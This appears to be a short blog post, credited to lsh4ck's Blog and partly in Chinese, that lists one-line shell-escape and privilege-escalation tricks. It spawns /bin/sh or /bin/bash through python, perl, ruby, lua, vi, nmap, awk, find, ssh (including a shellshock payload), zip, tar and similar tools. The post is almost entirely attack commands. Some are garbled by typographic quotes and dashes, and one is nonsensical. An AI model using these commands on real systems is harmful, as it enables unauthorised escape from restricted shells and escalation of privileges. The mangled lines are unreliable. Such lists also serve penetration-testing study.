python -c ‘import pty; pty.spawn(“/bin/sh”)’
echo os.system(‘/bin/bash’)
/bin/sh -i
perl —e ‘exec “/bin/sh”;’
perl: exec “/bin/sh”;
ruby: exec “/bin/sh”
lua: os.execute(‘/bin/sh’)
From within IRB
exec “/bin/sh”
From within vi
:!bash
:set shell=/bin/bash:shell
From within nmap
!sh
From scp:
scp -S /path/yourscript x y:
AWK:
awk ‘BEGIN {system(“/bin/sh or /bin/bash”)}’
find:
find / -name test -exec /bin/sh or /bin/bash ;
ssh:
ssh username@IP – t “/bin/sh” or “/bin/bash”
ssh username@IP -t “bash –noprofile”
ssh username@IP -t “() { :; }; /bin/bash” (shellshock)
ssh -o ProxyCommand=”sh -c /tmp/yourfile.sh” 127.0.0.1 (SUID)
git 帮助状态下通过!/bin/bash 进入交互式 shell
pico -s “/bin/bash”进入编辑器写入/bin/bash 然后按 ctrl + T 键
zip /tmp/test.zip /tmp/test -T –unzip-command=”sh -c /bin/bash”
tar cf /dev/null testfile –checkpoint=1 –checkpointaction=exec=/bin/bash
文章来源于:lsh4ck’s Blog
暂无评论内容